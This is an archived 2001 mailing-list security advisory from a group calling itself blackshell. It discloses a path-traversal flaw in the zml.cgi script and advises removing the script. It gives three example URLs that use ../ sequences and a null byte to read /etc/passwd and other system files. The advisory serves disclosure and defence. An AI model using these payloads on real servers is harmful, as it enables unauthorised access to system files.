OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: blackshellhushmail.com
Date: Mon Dec 31 2001 - 02:04:20 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

    #####################################################
    #--blackshell security advisory no2--# #
    #--zml.cgi remote exploit--# #
    #####################################################

    ########################
    vendor details & history
    ########################

    zml.cgi for webservers
    by jero.cc

    http://www.jero.cc/zml/zml.html

    ##################
    details of exploit
    ##################

    this is a classic CGI bug which uses ../../../../ to read remote files.

    example:

    http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
    http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
    http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00

    this may be used by the attacker to gather vital details about the remote server.

    ###
    fix
    ###

    remote this script from your webserver

    ####
    note
    ####

    this test was conducted on apache box, and a redhat server.
    under no circumstances are we liable for any misuse of this
    information

    ########
    hi's to:
    ########

    blackshell dev team, #!blackshell contributors and anyone who
    over the years has helped us make us what we are

    #######
    contact
    #######

    blackshellhushmail.com

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut
    bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA==
    =yPg1
    -----END PGP SIGNATURE-----